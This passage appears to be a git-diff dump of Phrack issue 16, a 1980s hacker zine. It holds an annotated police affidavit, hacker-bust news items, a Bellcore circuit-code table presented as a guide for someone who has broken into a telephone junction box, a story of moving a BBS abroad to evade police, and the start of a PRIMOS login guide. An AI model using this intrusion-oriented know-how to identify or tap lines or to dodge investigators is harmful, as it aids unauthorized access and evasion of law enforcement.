Stephen Hansen - Stanford Electrical Eng./ Director
|
||||
Brian Bales - Sprint Telecom./ Security Investigator
|
||||
M. Locker - ITT Communications/ Security Investigator
|
||||
Jerry Slaughter - MCI Communications/Security Investigator
|
||||
|
||||
4. On 11/14/86, I met with Detective Sgt. John McMullen, who related the
|
||||
following:
|
||||
|
||||
a. Beginning on or about 9/1/86, an unknown suspect or group of
|
||||
suspects using the code name Pink Floyd repeatedly accessed the Unix and
|
||||
Portia computer systems at Stanford University without authorization.
|
||||
|
||||
b. The suspects initially managed to decode the password of a computer
|
||||
user called "Laurent" and used the account without the permission or knowledge
|
||||
of the account holder. The true account holder was given a new account
|
||||
and a program was set up to print out all activity on the "Laurent" account.
|
||||
|
||||
c & d. Mentions the systems that were accessed illegally, the most
|
||||
'dangerous' being Arpanet (geeeee).
|
||||
|
||||
e. Damage was estimated at $10,000 by Director of Stanford Computers.
|
||||
|
||||
g. On 1/13/87, the suspect(s) resumed regular break-ins to the
|
||||
"Laurent" account, however traps and traces were initially unsuccessful in
|
||||
identifying the suspect(s) because the suspect(s) dialed into the Stanford
|
||||
Computer System via Sprint or MCI lines, which did not have immediate trap and
|
||||
trace capabilities.
|
||||
|
||||
6. On 2/19/87 I forwarded the details of my investigation and a request for
|
||||
collateral investigation to the New York Field Office of The U.S. Secret
|
||||
Service. (The USSS [I could say something dumb about USSR here]). SA Walter
|
||||
Burns was assigned the investigation.
|
||||
|
||||
7. SA Burns reported telephonically that comparison of the times at which
|
||||
Stanford suffered break ins [aahhh, poor Stanford] with that of DNR's on
|
||||
suspects in New York, Pennsylvania, Massachusetts, Maryland and California
|
||||
showed a correlation.
|
||||
|
||||
8. [Some stuff about Oryan QUEST engineering Cosmos numbers].
|
||||
|
||||
9. On 4/2/87, I was telephoned again by Mr. Daugherty who reported that on
|
||||
4/1/87, while checking a trouble signal on the above DNR's [on Oryan's lines],
|
||||
he overheard a call between the central figure in the New York investigation
|
||||
and [Oryan Quest's real name.] Mr. Daughtery was able to identify and
|
||||
distinguish between the three suspects because they addressed each other by
|
||||
there first name. During the conversation, [Oryan Quest] acknowledged being
|
||||
a member of L.O.D. (Legion Of Doom), a very private and exclusive group of
|
||||
computer hackers. [Oryan QUEST never was a member.]
|
||||
|
||||
10. [Mr. Daughtery continued to listen while QUEST tried to engineer some
|
||||
stuff. Gee what a coincidence that a security investigator was investigating
|
||||
a technical problem at the same time a conversation with 2 of the suspects was
|
||||
happening, and perhaps he just COULDN'T disconnect and so had to listen in for
|
||||
20 minutes or so. What luck.]
|
||||
|
||||
11. SA Burns reported that the suspects in New York regularly called the
|
||||
suspects in California.
|
||||
|
||||
14. From 4/30/87 to 6/15/87 DNR's were on both California suspects and were
|
||||
monitored by me.
|
||||
|
||||
[The data from the DNR's was 'analyzed' and sent to Sprint, MCI, and ITT to
|
||||
check on codes. Damages claimed by the various LDX's were:
|
||||
|
||||
SPRINT : Oryan QUEST : 3 codes for losses totaling $4,694.72
|
||||
Mark Of CA : 2 codes for losses totaling $1,912.57
|
||||
|
||||
ITT : Mark Of CA : 4 codes for losses totaling $639
|
||||
|
||||
MCI : Mark Of CA : 1 code for losses totaling $1,813.62
|
||||
|
||||
And the winner is....Oryan QUEST at $4,694.72 against Mark with $4,365.19.]
|
||||
|
||||
20. Through my training and investigation I have learned that people who
|
||||
break into computers ("hackers") and people who fraudulently obtain
|
||||
telecommunications services ("freakers") are a highly sophisticated and close
|
||||
knit group. They routinely communicate with each other directly or through
|
||||
electronic bulletin boards.
|
||||
|
||||
[Note: When a Phrack reporter called Lewis Jackson and asked why after
|
||||
his no doubt extensive training he didn't spell "freakers" correctly with a
|
||||
'ph' he reacted rather rudely.]
|
||||
|
||||
21.
|
||||
22. [Jackson's in depth analysis of what hackers have ("Blue Boxes are
|
||||
23. normally made from pocket calculators...") and their behavior]
|
||||
24.
|
||||
|
||||
26. Through my training and investigations, I have learned that evidence
|
||||
stored in computers, floppy disks, and speed dialers is very fragile and can
|
||||
be destroyed in a matter of seconds by several methods including but not
|
||||
limited to: striking one or more keys on the computer keyboard to trigger a
|
||||
preset computer program to delete information stored within, passing a strong
|
||||
magnetic source in close proximity to a computer, throwing a light switch
|
||||
designed to either trigger a preset program or cut power in order to delete
|
||||
information stored in a computer or speed dialer or computer; or simply
|
||||
delivering a sharp blow to the computer. [Blunt blows don't cut it.]
|
||||
|
||||
27. Because of the ease with which evidence stored in computers can be
|
||||
destroyed or transferred, it is essential that search warrants be executed at
|
||||
a time when the suspect is least likely to be physically operating the target
|
||||
computer system and least likely to have access to methods of destroying or
|
||||
transferring evidence stored within the system. Because of the rapidity of
|
||||
modern communications and the ability to destroy or transfer evidence remotely
|
||||
by one computer to another, it is also essential that in cases involving
|
||||
multiple suspects, all search warrants must be executed simultaneously.
|
||||
|
40
phrack16/1.txt
Normal file
40
phrack16/1.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
===== Phrack Magazine presents Phrack 16 =====
|
||||
===== File 1 of 12 : Phrack 16 Intro =====
|
||||
|
||||
Greetings, and welcome to Phrack #16, we are a bit late, but bigger
|
||||
then ever. I think you will find this issue very interesting.
|
||||
Enjoy and have Phun
|
||||
|
||||
Elric of Imrryr - Editor
|
||||
|
||||
|
||||
Contents this issue:
|
||||
|
||||
16.1 Phrack 16 Intro by Elric of Imrryr 2K
|
||||
16.2 BELLCORE Information by The Mad Phone-Man 11K
|
||||
16.3 A Hacker's Guide to Primos: Part 1 by Cosmos Kid 11K
|
||||
16.4 Hacking GTN by The Kurgan 7K
|
||||
16.5 Credit Card Laws Laws by Tom Brokow 7K
|
||||
16.6 Tapping Telephone Lines by Agent Steal 9K
|
||||
16.7 Reading Trans-Union Credit Reports by The Disk Jockey 6K
|
||||
|
||||
Phrack World News:
|
||||
|
||||
16.8 The Story Of the West German Hackers by Shooting Shark 3K
|
||||
16.9 The Mad Phone-Man and the Gestapo by The Mad Phone-Man 2K
|
||||
16.10 Flight of the Mad Phone-Man by The Mad Phone-Man 2K
|
||||
16.11 Shadow Hawk Busted Again by Shooting Shark 2K
|
||||
16.12 Coin Box Thief Wanted by The $muggler 2K
|
||||
|
||||
|
||||
|
||||
Submission to Phrack may be sent to the following BBSes:
|
||||
|
||||
Unlimited Reality 313-489-0747 Phrack
|
||||
The Free World 301-668-7657 Phrack Inc. (*)
|
||||
The Executive Inn 915-581-5145 Phrack
|
||||
Lunatic Labs UnLtd. 415-278-7421 Phrack (*)
|
||||
House of the Rising Sun 401-789-1809 Phrack
|
||||
|
||||
|
||||
* You will get the quickest reply from these systems.
|
40
phrack16/10.txt
Normal file
40
phrack16/10.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
#### PHRACK PRESENTS ISSUE 16 ####
|
||||
^*^*^*^Phrack World News, Part 3^*^*^*^
|
||||
**** File 10 of 12 ****
|
||||
|
||||
|
||||
[Ed's Note: Certain names have been change in the article to protect the
|
||||
author]
|
||||
|
||||
The Flight of The Mad Phone-Man's BBS to a Friendly Foreign Country
|
||||
|
||||
|
||||
Using my knowledge that the pigs grab your computer when they bust
|
||||
you,I got real worried about losing a BIG investment I've got in my IBM. I
|
||||
decide there's a better way.... Move it! But where? Where's safe from the
|
||||
PhBI? Well in the old days, to escape the draft, you went to Canada, why not
|
||||
expatriate my board.... Well the costs of a line are very high, let's see
|
||||
what's available elsewhere.
|
||||
One afternoon, I'm working at a local hospital,(one I do telecom work
|
||||
for) and I ask the comm mgr if they have any links to Canada? He says why
|
||||
yes, we have an inter-medical link over a 23ghz microwave into the city just
|
||||
across the border. I ask to see the equipment. WOW! My dreams come true,
|
||||
it's a D4 bank (Rockwell) and it's only got 4 channel cards in it. Now, being
|
||||
a "nice" guy, I offer to do maintenance on this equipment if he would let me
|
||||
put up another channel...he agrees. The plot thickens.
|
||||
I've got a satellite office for a business near the hospital on the
|
||||
other side, I quickly call up good ole Bell Canada, and have them run a 2 wire
|
||||
line from the equipment room to my office. Now the only thing to get is a
|
||||
couple of cards to plug into the MUX to put me on the air.
|
||||
A 2 wire E&M card goes for bout $319, and I'd need two. Ilook around
|
||||
the state, and find one bad one in Rochester.... I'm on my way that afternoon
|
||||
via motorcycle. The card is mine, and the only thing I can find wrong is a
|
||||
bad voltage regulator. I stop by the Rockwell office in suburban Rochester
|
||||
and exchange the card, while I'm there, I buy a second one (Yeah, on my card)
|
||||
and drive home.... by 9pm that night the circuit is up, and we are on the air.
|
||||
Results- Very good line, no noise, can be converted with another card
|
||||
for a modest fee if I want the bandwidth. So that's the story of how the
|
||||
board went to a "friendly foreign country."
|
||||
|
||||
|
||||
The Mad Phone-Man
|
53
phrack16/11.txt
Normal file
53
phrack16/11.txt
Normal file
|
@ -0,0 +1,53 @@
|
|||
#### PHRACK PRESENTS ISSUE 16 ####
|
||||
^*^*^*^Phrack World News, Part 4^*^*^*^
|
||||
**** File 11 of 12 ****
|
||||
|
||||
|
||||
Shadow Hawk Busted Again
|
||||
========================
|
||||
|
||||
As many of you know, Shadow Hawk (a/k/a Shadow Hawk 1) had his home
|
||||
searched by agents of the FBI, Secret Service, and the Defense Criminal
|
||||
Investigative Services and had some of his property confiscated by them on
|
||||
September 4th. We're not going to reprint the Washington Post article as it's
|
||||
available through other sources. Instead, a summary:
|
||||
|
||||
In early July, SH bought an AT&T 3B1 ("Unix PC") with a 67MB drive for
|
||||
a dirt-cheap $525. He got Sys V 3.5 for another $200 but was dissatisfied
|
||||
with much of the software they gave him (e.g. they gave him uucp version 1.1).
|
||||
|
||||
When he was tagged by the feds, he had been downloading software (in
|
||||
the form of C sources) from various AT&T systems. According to reports, these
|
||||
included the Bell Labs installations at Naperville, Illinois and Murray Hill,
|
||||
New Jersey. Prosecutors said he also gained entry to (and downloaded software
|
||||
from) AT&T systems at a NATO installation in Burlington, North Carolina and
|
||||
Robins AFB in Georgia. AT&T claims he stole $1 million worth of software.
|
||||
Some of it was unreleased software taken from the Bell Labs systems that was
|
||||
given hypothetical price tags by Bell Labs spokespersons. Agents took his
|
||||
3B1, two Atari STs he had in his room, and several diskettes.
|
||||
|
||||
SH is 17 and apparently will be treated as a minor. At the time of
|
||||
this writing, he will either be subject to federal prosecution for 'computer
|
||||
theft' or will be subject to prosecution only by the State of Illinois.
|
||||
|
||||
SH's lawyer, Karen Plant, was quoted as saying that SH "categorically
|
||||
denies doing anything that he should not have been doing" and that he "had
|
||||
absolutely no sinister motives in terms of stealing property." As we said, he
|
||||
was just collecting software for his new Unix PC. When I talked to Ms. Plant
|
||||
on September 25th, she told me that she had no idea if or when the U.S.
|
||||
Attorney would prosecute. Karen Plant can be reached at (312) 263-1355. Her
|
||||
address is 134 North LaSalle, #306, Chicago, Illinois.
|
||||
|
||||
|
||||
---------
|
||||
|
||||
On July 9th SH wrote:
|
||||
|
||||
So you see, I'm screwed. Oh yeah, even worse! In my infinite (wisdom
|
||||
|| stupidity, take your pick 8-)) I set up a local AT&T owned 7300 to call me
|
||||
up and send me their uucp files (my uucp works ok for receive) and guess what.
|
||||
I don't think I've to elaborate further on THAT one... (holding my breath, so
|
||||
to type)
|
||||
(_>Sh<_
|
||||
|
||||
---
|
40
phrack16/12.txt
Normal file
40
phrack16/12.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
#### PHRACK PRESENTS ISSUE 16 ####
|
||||
^*^*^*^Phrack World News, Part 5^*^*^*^
|
||||
**** File 12 of 12 ****
|
||||
|
||||
|
||||
"Phone Companies Across U.S. Want Coins Box Thief's Number"
|
||||
From the Tribune - Thursday, Nov. 5, 1987
|
||||
|
||||
|
||||
SAN FRANCISCO - Seven telephone companies across the country, including
|
||||
Pacific Bell, are so frazzled by a coin box thief that they are offering a
|
||||
reward of $25,000 to catch him.
|
||||
|
||||
He's very clever, telephone officials say, and is the only known suspect in
|
||||
the country that is able to pick the locks on coin boxes in telephone
|
||||
booths with relative ease.
|
||||
|
||||
He is believed responsible for stealing hundreds of thousands of dollars from
|
||||
coin boxes in the Bay Area and Sacramento this year.
|
||||
|
||||
The suspect has been identified by authorities as James Clark, 47, of
|
||||
Pennisula, Ohio, a machinist and tool-and-die maker, who is believed
|
||||
responsible for coin box thefts in 24 other states.
|
||||
|
||||
Other companies sharing in the reward are Ohio Bell, Southern Bell, South
|
||||
Carolina Bell, South Central Bell, Southwestern Bell, Bell Telephone of
|
||||
Pennsylvania and U.S. West.
|
||||
|
||||
Clark allegedly hit pay phones that are near freeways and other major
|
||||
thoroughfares. Clark, described as 5 feet 9 inches tall, with shoulder
|
||||
length brown hair and gold-rimmed glasses, is reported to be driving a new
|
||||
Chevrolet Astro van painted a dark metallic blue.
|
||||
|
||||
He was recently in Arizona but is believed to be back in California.
|
||||
|
||||
Written by a Tribune Staff Writer
|
||||
|
||||
|
||||
Typed by the $muggler
|
||||
|
313
phrack16/2.txt
Normal file
313
phrack16/2.txt
Normal file
|
@ -0,0 +1,313 @@
|
|||
===== Phrack Magazine presents Phrack 16 =====
|
||||
===== File 2 of 12 =====
|
||||
|
||||
--------------------------------------------------------------------
|
||||
BELLCORE Information by The Mad Phone-man
|
||||
--------------------------------------------------------------------
|
||||
|
||||
So, you've broken into the big phone box on the wall, and are looking at a
|
||||
bunch of tags with numbers and letters on them. Which one is the modem line?
|
||||
Which one is the 1-800 WATS line? Which one is the Alarm line? Bell has a
|
||||
specific set of codes that enable you to identify what you're looking at.
|
||||
These are the same codes the installer gets from the wire center to enable him
|
||||
to set up the line, test it, and make sure it matches the customers order.
|
||||
Here are some extracts from the Bellcore book.
|
||||
|
||||
First lets take a hypothetical line number I'm familiar with:
|
||||
64FDDV 123456
|
||||
-------------------------------------------------------------
|
||||
The serial number format:
|
||||
|
||||
Prefix + service code + modifier + serial number +
|
||||
digits: 1,2 3,4 5,6 7,8,9,10,11,12 continued
|
||||
-------------------------------------------------------------------------
|
||||
|
||||
Suffix + CO assigning circuit number + segment
|
||||
digits: 13,14,15 16,17,18,19 20,21,22
|
||||
-------------------------------------------------------------------------
|
||||
|
||||
The important shit is in the 3rd thru 6th digit.
|
||||
|
||||
SERVICE CODES Intra or Inter LATA Block 1-26
|
||||
-------------
|
||||
AA- Packet analog access line
|
||||
AB- Packet switch trunk
|
||||
AD- Attendant
|
||||
AF- Commercial audio fulltime
|
||||
AI- Automatic identified outward dialing
|
||||
AL- Alternate services
|
||||
AM- Packet, off-network access line
|
||||
AN- Announcement service
|
||||
AO- International/Overseas audio (full time)
|
||||
AP- Commercial audio (part time)
|
||||
AT- International/Overseas audio (part time)
|
||||
AU- Autoscript
|
||||
BA- Protective alarm (CD)
|
||||
BL- Bell & lights
|
||||
BS- Siren control
|
||||
CA- SSN Access
|
||||
CB- OCC Audio facilities
|
||||
CC- OCC Digital facility-medium speed
|
||||
CE- SSN Station line
|
||||
CF- OCC Special facility
|
||||
CG- OCC Telegraph facility
|
||||
CH- OCC Digital facility high-speed
|
||||
CI- Concentrator Identifier trunk
|
||||
CJ- OCC Control facility
|
||||
CK- OCC Overseas connecting facility wide-band
|
||||
CL- Centrex CO line
|
||||
CM- OCC Video facility
|
||||
CN- SSN Network trunk
|
||||
CO- OCC Overseas connecting facility
|
||||
CP- Concentrator identifier signaling link
|
||||
CR- OCC Backup facility
|
||||
CS- Channel service
|
||||
CT- SSN Tie trunk
|
||||
CV- OCC Voice grade facility
|
||||
CW- OCC Wire pair facility
|
||||
CZ- OCC Access facility
|
||||
DA- Digital data off-net extension
|
||||
DB- HSSDS 1.5 mb/s access line
|
||||
DF- HSSDS 1.5 mb/s hub to hub
|
||||
DG- HSSDS 1.5 mb/s hub to earth station
|
||||
DH- Digital service
|
||||
DI- Direct-in dial
|
||||
DJ- Digit trunk
|
||||
DK- Data link
|
||||
DL- Dictation line
|
||||
DO- Direct-out dial
|
||||
DP- Digital data-2 4 kb/s
|
||||
DQ- Digital data-4 8 kb/s
|
||||
DR- Digital data-9.6 kb/s
|
||||
DW- Digital data-56 kb/s
|
||||
DY- Digital service (under 1 mb/s)
|
||||
EA- Switched access
|
||||
EB- ENFIA II end office trunk
|
||||
EC- ENFIA II tandem trunk
|
||||
EE- Combined access
|
||||
EF- Entrance facility-voice grade
|
||||
EG- Type #2 Telegraph
|
||||
EL- Emergency reporting line
|
||||
EM- Emergency reporting center trunk
|
||||
EN- Exchange network access facility
|
||||
EP- Entrance facility-program grade
|
||||
EQ- Equipment only-(network only) assignment
|
||||
ES- Extension service-voice grade
|
||||
ET- Entrance facility-telegraph grade
|
||||
EU- Extension service-telegraph grade
|
||||
EV- Enhanced Emergency reporting trunk
|
||||
EW- Off network MTS/WATS equivalent service
|
||||
FD- Private line-data
|
||||
FG- Group-supergroup spectrum
|
||||
FR- Fire dispatch
|
||||
FT- Foreign exchange trunk
|
||||
FW- Wideband channel
|
||||
FV- Voice grade facility
|
||||
FX- Foreign exchange
|
||||
HP- Non-DDS Digital data 2.4 kb/s
|
||||
HQ- Non-DDS Digital data 4.8 kb/s
|
||||
HR- Non-DDS Digital data 9.6 kb/s
|
||||
HW- Non-DDS Digital data 56 kb/s
|
||||
IT- Intertandem tie trunk
|
||||
LA- Local area data channel
|
||||
LL- Long distance terminal line
|
||||
LS- Local service
|
||||
LT- Long distance terminal trunk
|
||||
MA- Cellular access trunk 2-way
|
||||
MT- Wired music
|
||||
NA- CSACC link (EPSCS)
|
||||
NC- CNCC link (EPSCS)
|
||||
ND- Network data line
|
||||
OI- Off premises intercommunication station line
|
||||
ON- Off network access line
|
||||
OP- Off premises extension
|
||||
OS- Off premises PBX station line
|
||||
PA- Protective alarm (AC)
|
||||
PC- Switched digital-access line
|
||||
PG- Paging
|
||||
PL- Private line-voice
|
||||
PM- Protective monitoring
|
||||
PR- Protective relaying-voice grade
|
||||
PS- MSC constructed spare facility
|
||||
PV- Protective relaying-telegraph grade
|
||||
PW- Protective relaying-signal grade
|
||||
PX- PBX station line
|
||||
PZ- MSC constructed circuit
|
||||
QU- Packet asynchronous access line
|
||||
QS- Packet synchronous access line
|
||||
RA- Remote attendant
|
||||
RT- Radio landline
|
||||
SA- Satellite trunk
|
||||
SG- Control/Remote metering signal grade
|
||||
SL- Secretarial line
|
||||
SM- Sampling
|
||||
SN- Special access termination
|
||||
SQ- Equipment only-customer premises
|
||||
SS- Dataphone select-a-station
|
||||
TA- Tandem tie-trunk
|
||||
TC- Control/Remote metering-telegraph grade
|
||||
TF- Telephoto/Facsimile
|
||||
TK- Local PBX trunk
|
||||
TL- Non-tandem tie trunk
|
||||
TR- Turret or automatic call distributor (ACD) trunk
|
||||
TT- Teletypewriter channel
|
||||
TU- Turret or automatic call distributor (ACD) line
|
||||
TX- Dedicated facility
|
||||
VF- Commercial television (full time)
|
||||
VH- Commercial television (part time)
|
||||
VM- Control/Remote metering-voice grade
|
||||
VO- International overseas television
|
||||
VR- Non-commercial television (7003,7004)
|
||||
WC- Special 800 surface trunk
|
||||
WD- Special WATS trunk (OUT)
|
||||
WI- 800 surface trunk
|
||||
WO- WATS line (OUT)
|
||||
WS- WATS trunk (OUT)
|
||||
WX- 800 service line
|
||||
WY- WATS trunk (2-way)
|
||||
WZ- WATS line (2-way)
|
||||
ZA- Alarm circuits
|
||||
ZC- Call and talk circuits
|
||||
ZE- Emergency patching circuits
|
||||
ZF- Order circuits, facility
|
||||
ZM- Measurement and recording circuits
|
||||
ZP- Test circuit, plant service center
|
||||
ZQ- Quality and management circuits
|
||||
ZS- Switching, control and transfer circuits
|
||||
ZT- Test circuits, central office
|
||||
ZV- Order circuits, service
|
||||
|
||||
SERVICE CODES FOR LATA ACCESS
|
||||
---------------------------------------------------
|
||||
HC- High capacity 1.544 mb/ps
|
||||
HD- High capacity 3.152 mb/ps
|
||||
HE- High capacity 6.312 mb/ps
|
||||
HF- High capacity 6.312
|
||||
HG- High capacity 274.176 mb/s
|
||||
HS- High capacity subrate
|
||||
LB- Voice-non switched line
|
||||
LC- Voice-switched line
|
||||
LD- Voice-switched trunk
|
||||
LE- Voice and tone-radio landline
|
||||
LF- Data low-speed
|
||||
LG- Basic data
|
||||
LH- Voice and data-PSN access trunk
|
||||
LJ- Voice and data SSN access
|
||||
LK- Voice and data-SSN-intermachine trunk
|
||||
LN- Data extension, voice grade data facility
|
||||
LP- Telephoto/Facsimile
|
||||
LQ- Voice grade customized
|
||||
LR- Protection relay-voice grade
|
||||
LZ- Dedicated facility
|
||||
MQ- Metallic customized
|
||||
NQ- Telegraph customized
|
||||
NT- Protection alarm-metallic
|
||||
NU- Protection alarm
|
||||
NV- Protective relaying/Telegraph grade
|
||||
NW- Telegraph grade facility-75 baud
|
||||
NY- Telegraph grade facility- 150 baud
|
||||
PE- Program audio, 200-3500 hz
|
||||
PF- Program audio, 100-5000 hz
|
||||
PJ- Program audio, 50-8000 hz
|
||||
PK- Program audio, 50-15000 hz
|
||||
PQ- Program grade customized
|
||||
SB- Switched access-standard
|
||||
SD- Switched access-improved
|
||||
SE- Special access WATS-access-std
|
||||
SF- Special access WATS access line improved
|
||||
SJ- Limited switched access line
|
||||
TQ- Television grade customized
|
||||
TV- TV Channel one way 15khz audio
|
||||
TW- TV Channel one way 5khz audio
|
||||
WB- Wideband digital, 19.2 kb/s
|
||||
WE- Wideband digital, 50 kb/s
|
||||
WF- Wideband digital, 230.4 kb/s
|
||||
WH- Wideband digital, 56 kb/s
|
||||
WJ- Wideband analog, 60-108 khz
|
||||
WL- Wideband analog 312-552 khz
|
||||
WN- Wideband analog 10hz-20 khz
|
||||
WP- Wideband analog, 29-44 khz
|
||||
WR- Wideband analog 564-3064 khz
|
||||
XA- Dedicated digital, 2.4 kb/s
|
||||
XB- Dedicated digital, 4.8 kb/s
|
||||
XG- Dedicated digital, 9.6 kb/s
|
||||
XH- Dedicated digital 56. kb/s
|
||||
|
||||
|
||||
|
||||
Now the last two positions of real importance, 5 & 6 translate thusly:
|
||||
|
||||
Modifier Character Position 5
|
||||
------------------------------
|
||||
|
||||
INTRASTATE INTERSTATE
|
||||
-------------------------------------
|
||||
A B Alternate data & non data
|
||||
-------------------------------------
|
||||
C Customer controlled service
|
||||
-------------------------------------
|
||||
D E Data
|
||||
-------------------------------------
|
||||
N L Non-data operation
|
||||
-------------------------------------
|
||||
P Only offered under intra restructured
|
||||
private line (RPL) tariff
|
||||
-------------------------------------
|
||||
S T Simultaneous data & non-data
|
||||
-------------------------------------
|
||||
F Interexchange carriers is less than 50%
|
||||
-------------------------------------
|
||||
G Interstate carrier is more than 50%
|
||||
usage
|
||||
==============================================================================
|
||||
|
||||
MODIFIER CHARACTER POSITION 6
|
||||
--------------------------------------------------------------
|
||||
|
||||
TYPE OF SERVICE Intra LATA
|
||||
--------------------------------------
|
||||
ALL EXCEPT US GOVT US GOVERNMENT
|
||||
--------------------------------------
|
||||
T M Circuit is BOC customer to BOC customer
|
||||
all facilities are TELCO provided
|
||||
--------------------------------------
|
||||
C P Circuit is BOC/BOC and part of
|
||||
facilities or equipment is telco
|
||||
provided
|
||||
--------------------------------------
|
||||
A J Circuit is BOC/BOC all electrically
|
||||
connected equip is customer provided
|
||||
--------------------------------------
|
||||
L F Circuit terminates at interexchange
|
||||
carrier customers location
|
||||
--------------------------------------
|
||||
Z Official company service
|
||||
--------------------------------------
|
||||
Interlata
|
||||
S S Circuit terminates at interexchange
|
||||
carriers point of term (POT)
|
||||
--------------------------------------
|
||||
V V Circuit terminates at an interface of a
|
||||
radio common carrier (RCC)
|
||||
--------------------------------------
|
||||
Z Official company service
|
||||
--------------------------------------
|
||||
|
||||
Corridor
|
||||
Y X Corridor circuit
|
||||
--------------------------------------
|
||||
International
|
||||
K H Circuit has at least 2 terminations in
|
||||
different countries
|
||||
--------------------------------------
|
||||
Interexchange carrier
|
||||
Y X Transport circuit between interexchange
|
||||
carrier terminals.
|
||||
----------------------------------------
|
||||
|
||||
So 64FDDV would be a private line data circuit terminating at a radiocommon
|
||||
carrier. Other examples can be decoded likewise.
|
||||
|
||||
Enjoy this information as much as I've had finding it.
|
||||
|
||||
-= The Mad Phone-man =-
|
289
phrack16/3.txt
Normal file
289
phrack16/3.txt
Normal file
|
@ -0,0 +1,289 @@
|
|||
===== Phrack Magazine presents Phrack 16 =====
|
||||
===== File 3 of 12 =====
|
||||
|
||||
==========================================
|
||||
==== Cosmos Kid Presents... ====
|
||||
==== A Hacker's Guide To: PRIMOS ====
|
||||
==== Part I ====
|
||||
==== (c) 1987 by Cosmos Kid ====
|
||||
==========================================
|
||||
|
||||
Author's Note:
|
||||
--------------
|
||||
This file is the first of two files dealing with PRIMOS and its operations.
|
||||
The next file will be in circulation soon so be sure to check it out at any
|
||||
good BBS.
|
||||
|
||||
|
||||
Preface:
|
||||
--------
|
||||
This file is written in a form to teach beginners as well as experienced
|
||||
Primos users about the system. It is written primarily for beginners however.
|
||||
PRIMOS, contrary to popular belief can be a very powerful system if used
|
||||
correctly. I have outlined some VERY BASIC commands and their use in this
|
||||
file along with some extra commands, not so BASIC.
|
||||
|
||||
|
||||
Logging On To A PRIMOS:
|
||||
-----------------------
|
||||
A PRIMOS system is best recognized by its unusual prompts. These are: 'OK',
|
||||
and 'ER!'. Once connected, these are not the prompts you get. The System
|
||||
should identify itself with a login such as:
|
||||
|
||||
Primenet V2.3
|
||||
-or-
|
||||
Primecom Network
|
||||
|
||||
The system then expects some input from you,preferably: LOGIN. You will
|
||||
then be asked to enter your user identification and password as a security
|
||||
measure. The login onto a PRIMOS is as follows:
|
||||
|
||||
CONNECT
|
||||
Primenet V 2.3 (system)
|
||||
LOGIN<CR> (you)
|
||||
User id? (system)
|
||||
AA1234 (you)
|
||||
Password? (system)
|
||||
KILLME (you)
|
||||
OK, (system)
|
||||
|
||||
|
||||
Preceding the OK, will be the systems opening message. Note that if you fail
|
||||
to type login once connected, most other commands are ignored and the system
|
||||
responds with:
|
||||
|
||||
Please Login
|
||||
ER!
|
||||
|
||||
|
||||
Logging Off Of A PRIMOS:
|
||||
------------------------
|
||||
If at any time you get bored with Primos, just type 'LOGOFF' to leave the
|
||||
system. Some systems have a TIMEOUT feature implemented meaning that if you
|
||||
fail to type anything for the specified amount of time the system will
|
||||
automatically log you out, telling you something like:
|
||||
|
||||
Maximum Inactive Time Limit Exceeded
|
||||
|
||||
|
||||
System Prompts:
|
||||
---------------
|
||||
As stated previously, the prompts 'ER!' and 'OK,' are used on Primos. The
|
||||
'OK,' denotes that last command was executed properly and it is now waiting
|
||||
for your next command. The 'ER!' prompt denotes that you made an error in
|
||||
typing your last command. This prompt is usually preceded by an error
|
||||
message.
|
||||
|
||||
|
||||
Special Characters:
|
||||
-------------------
|
||||
Some terminals have certain characteristics that are built in to the terminal.
|
||||
key
|
||||
|
||||
CONTROL-H
|
||||
Deletes the last character typed.
|
||||
|
||||
|
||||
Other Special Characters:
|
||||
-------------------------
|
||||
RETURN: The return key signals PRIMOS that you have completed typing a
|
||||
command and that you are ready for PRIMOS to process the command.
|
||||
|
||||
BREAK/CONTROL-P: Stops whatever is currently being processed in memory and
|
||||
will return PRIMOS to your control. To restart a process,
|
||||
type:
|
||||
START (abbreviated with S).
|
||||
|
||||
CONTROL-S: Stops the scrolling of the output on your terminal for viewing.
|
||||
|
||||
CONTROL-Q: Resumes the output scrolling on your terminal for inspection.
|
||||
|
||||
SEMICOLON ';': The logical end of line character. The semicolon is used to
|
||||
enter more than one command on one line.
|
||||
|
||||
Getting Help:
|
||||
-------------
|
||||
You can get on-line information about the available PRIMOS commands by using
|
||||
the 'HELP' command. The HELP system is keyword driven. That is, all
|
||||
information is stored under keywords that indicate the content of the help
|
||||
files. This is similar to VAX. Entering the single command 'HELP' will enter
|
||||
the HELP sub-system and will display an informative page of text. The next
|
||||
page displayed will provide you with a list of topics and their keywords.
|
||||
These topics include such items as PRIME, RAP, MAIL, and DOC. If you entered
|
||||
the MAIL keyword, you would be given information concerning the mail sub-
|
||||
system available to users on P simply enter PRIME to obtain information on all
|
||||
PRIMOS commands. You could then enter COPY to obtain information on that
|
||||
specific topic.
|
||||
|
||||
|
||||
Files And Directories:
|
||||
----------------------
|
||||
The name of a file or sub-directory may have up to 32 characters. The
|
||||
filename may contain any of the following characters, with the only
|
||||
restriction being that the first character of the filename may not be a digit.
|
||||
Please note that BLANK spaces are NOT allowed ANYWHERE:
|
||||
|
||||
A-Z .....alphabet
|
||||
0-9 .....numeric digits
|
||||
& .....ampersand
|
||||
# .....pound sign
|
||||
$ .....dollar sign
|
||||
- .....dash/minus sign
|
||||
* .....asterisk/star
|
||||
. .....period/dot
|
||||
/ .....slash/divide sign
|
||||
|
||||
|
||||
Naming Conventions:
|
||||
-------------------
|
||||
There are very few restrictions on the name that you may give a file.
|
||||
However, you should note that many of the compilers (language processors) and
|
||||
commands on the PRIME will make certain assumptions if you follow certain
|
||||
guidelines. File name suffixes help to identify the file contents with regard
|
||||
to the language the source code was written in and the contents of the file.
|
||||
For instance, if you wrote a PL/1 program and named the file containing the
|
||||
source code 'PROG1.PL1' (SEGmented loader) would take the binary file, link
|
||||
all the binary libraries that you specify and produce a file named
|
||||
'PROG1.SEG', which would contain the binary code necessary to execute the
|
||||
program. Some common filename suffixes are: F77, PAS, COBOL, PL1G, BASIC,
|
||||
FTN, CC, SPIT (source files). These all denote separate languages and get
|
||||
into more advanced programming on PRIMOS. (e.g. FTN=Fortran).
|
||||
|
||||
BIN=the binary code produced by the compiler
|
||||
LIST=the program listing produced by the compiler
|
||||
SEG=the linked binary code produced by SEG
|
||||
|
||||
Some files which do not use standard suffixes may instead use the filename
|
||||
prefixes to identify the contents of the file. Some common filename prefixes
|
||||
are:
|
||||
|
||||
B Binary code produced by the compiler
|
||||
L source program Listing
|
||||
C Command files
|
||||
$ Temporary work files (e.g. T$0000)
|
||||
# Seg files
|
||||
|
||||
|
||||
Commands For File Handling:
|
